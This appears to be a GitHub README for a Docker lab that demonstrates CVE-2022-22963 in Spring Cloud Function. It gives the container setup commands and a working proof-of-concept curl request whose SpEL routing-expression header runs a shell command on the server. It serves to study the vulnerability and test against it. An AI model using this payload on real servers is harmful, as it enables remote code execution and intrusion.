Spring Cloud Function Vulnerability(CVE-2022-22963)
April 1, 2022 ยท View on GitHub
Vulnerable Application to CVE-2022-22963
CVE-2022-22963 Exploit Demo
Build
docker pull me2nuk/cves:2022-22963
docker run -it -p 8080:8080 --name=vuln me2nuk/cves:2022-22963
POC
curl -X POST http://0.0.0.0:8080/functionRouter -H 'spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("touch /tmp/pwned")' --data-raw 'data' -v
docker exec -it --user=root vuln ls /tmp